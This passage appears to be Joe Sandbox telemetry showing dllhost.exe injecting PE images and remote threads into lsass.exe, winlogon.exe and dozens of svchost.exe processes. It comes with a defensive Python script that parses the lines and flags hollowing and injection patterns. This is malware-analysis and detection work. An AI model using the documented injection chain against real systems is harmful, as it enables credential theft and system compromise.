Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 138D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F032EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: E5E22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4EE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC522EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC552EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 65092EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0522EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F2842EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E612EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E642EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: D6712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 37402EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3D52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE072EBC
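The evidence above is raw sandbox telemetry: one line per remote thread that dllhost.exe created in another process (the EIP column is the start address of the new thread), followed on this page by one line per cross-process write whose first bytes are 4D5A, the "MZ" signature of a PE header. Two things are worth checking mechanically rather than by eye. First, which of the written-to processes are security-critical (winlogon.exe and lsass.exe appear among the targets). Second, whether the thread start addresses cluster: across this report the EIP values end in 2EBC or 25AC regardless of target, i.e. they sit at the same offset inside a 64 KiB allocation-granularity region, which is consistent with one payload being mapped at a fresh base in every target and its entry routine started from the same offset each time. The script below is an added example and is not part of the Joe Sandbox report. It parses lines in this report's format (both the fused form produced by text extraction, "dllhost.exeThread created:", and a whitespace-separated form) and runs a short triage over a constructed sample of nine lines re-typed from this page. The SENSITIVE process list, the use of the default linker image bases 0x400000 and 0x140000000 as a hollowing hint, and the clustering threshold in findings() are assumptions, marked as such in the code.

```python
"""Triage helper for Joe Sandbox "Thread created" / "Memory written" lines.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
subset of the report's evidence lines so the script runs offline.
"""
import re
from collections import Counter

# Assumption: processes nothing in user mode should write a PE image into.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe",
             "smss.exe", "wininit.exe"}

# Default linker image bases for x86 (0x400000) and x64 (0x140000000) PEs;
# a write that starts exactly there is the hollowing pattern (heuristic).
DEFAULT_IMAGE_BASES = {0x400000, 0x140000000}

# \s* after the source path accepts the fused "....exeThread created:" form.
THREAD_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Thread created:\s*(?P<dst>.+?)\s+EIP:\s*(?P<eip>[0-9A-Fa-f]+)\s*$")
WRITE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Memory written:\s*(?P<dst>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+)\s*$")

SAMPLE = r"""
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 15D2EBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
"""


def basename(path: str) -> str:
    """Last path component, lower-cased; the literal 'unknown' passes through."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[dict]:
    """Turn report lines into event dicts; lines in neither format are skipped."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = THREAD_RE.match(line)
        if m:
            events.append({"kind": "thread", "src": m["src"], "dst": m["dst"],
                           "addr": int(m["eip"], 16)})
            continue
        m = WRITE_RE.match(line)
        if m:
            events.append({"kind": "write", "src": m["src"], "dst": m["dst"],
                           "addr": int(m["base"], 16), "magic": m["magic"].upper()})
    return events


def triage(events: list[dict], sensitive=frozenset(SENSITIVE)) -> dict:
    """Aggregate injection evidence per (source, target) pair."""
    threads, pe_writes, offsets = Counter(), Counter(), Counter()
    sensitive_hits, image_base_writes = set(), []
    for ev in events:
        src, dst = basename(ev["src"]), basename(ev["dst"])
        if ev["kind"] == "thread":
            threads[(src, dst)] += 1
            # Low 16 bits = offset within a 64 KiB allocation-granularity
            # region; few distinct offsets over many targets means the same
            # payload was mapped at new bases and started at the same routine.
            offsets[ev["addr"] & 0xFFFF] += 1
        elif ev["magic"].startswith("4D5A"):  # "MZ": a PE header was written
            pe_writes[(src, dst)] += 1
            if dst in sensitive:
                sensitive_hits.add(dst)
            if ev["addr"] in DEFAULT_IMAGE_BASES:
                image_base_writes.append((src, dst, ev["addr"]))
    return {"threads": threads, "pe_writes": pe_writes, "start_offsets": offsets,
            "sensitive_hits": sensitive_hits, "image_base_writes": image_base_writes}


def findings(summary: dict) -> list[str]:
    """Human-readable triage lines; thresholds are assumptions."""
    out = [f"PE header written into security-critical process {d}"
           for d in sorted(summary["sensitive_hits"])]
    for src, dst, base in summary["image_base_writes"]:
        out.append(f"{src} wrote a PE header at default image base {base:#x} of {dst} (hollowing pattern)")
    for (src, dst), n in summary["threads"].most_common():
        if dst != src:
            out.append(f"{src} created {n} remote thread(s) in {dst}")
    offs = summary["start_offsets"]
    if len(offs) <= 2 and sum(offs.values()) >= 3:  # assumed clustering threshold
        out.append("remote thread start addresses share allocation offset(s) "
                   + ", ".join(f"{o:#06x}" for o in offs))
    return out


if __name__ == "__main__":
    for line in findings(triage(parse_events(SAMPLE))):
        print("-", line)
```

Feed it a full text export of a report instead of SAMPLE to get the complete picture; on this report that means dozens of svchost.exe instances plus winlogon.exe, lsass.exe, dwm.exe, spoolsv.exe, sihost.exe, ctfmon.exe and OfficeClickToRun.exe as PE-write targets. The offset-clustering rule is corroboration only: it says the remote threads all start at the same place in a freshly mapped region, which fits the MZ writes, but it is not a verdict on its own.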
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17184260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
